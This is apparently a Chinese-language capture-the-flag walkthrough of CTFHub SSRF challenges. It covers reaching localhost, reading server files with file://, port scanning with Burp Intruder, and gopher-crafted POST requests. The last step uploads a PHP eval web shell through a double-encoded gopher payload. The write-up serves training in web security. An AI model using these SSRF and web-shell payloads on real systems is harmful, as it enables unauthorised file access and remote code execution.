内网访问 

一.进入页面，选择内网访问

二.开启题目，点击题目中的链接

 然后就进来页面了

三.在url里输入

http：//127.0.0.1/flag.php就可以得到flag 

四.提交flag

伪协议读取文件

一开启题目

二.点击进入链接 

三.输入file:///var/www/html/flag.php 然后发现页面不显示，查看页面源代码然后就得到flag

端口扫描 

一.开启端口扫描点击如图中链接

二.进入如图所示页面输入http://127.0.0.1:8000 

 

 三.打开burp抓包，发送到攻击器

先清除playload然后再8000的地方上添加playload 

 四.如图所示修改里面的值

 五.跑出来之后点开响应包可以查看flag

post请求

一.开启题目，点击题目链接 

 二.输入http://127.0.0.1/flag.php弹出一个框

打开页面源代码，复制key粘贴到提交框中 

 三.打开brup抓包，将抓到的数据留下如图所示内容修改为gopher构造post请求数据包

四.将里面内容进行俩次url编码 

五.然后关闭抓包，再次回到页面

六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag 

上传文件

一.点击开启，点入所给出的链接

 

二.进入浏览页面输入http://127.0.0.1/flag.php

出现上次文件

 发现没有提交按钮，我们自己往上写一个提交按钮

然后我们在自己写1.txt个文件进行提交

 

 

三.然后打开brup抓包 

在抓包页面进行编辑 

四.将抓好的内容进行俩次编码 

 

 五. 输入编码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交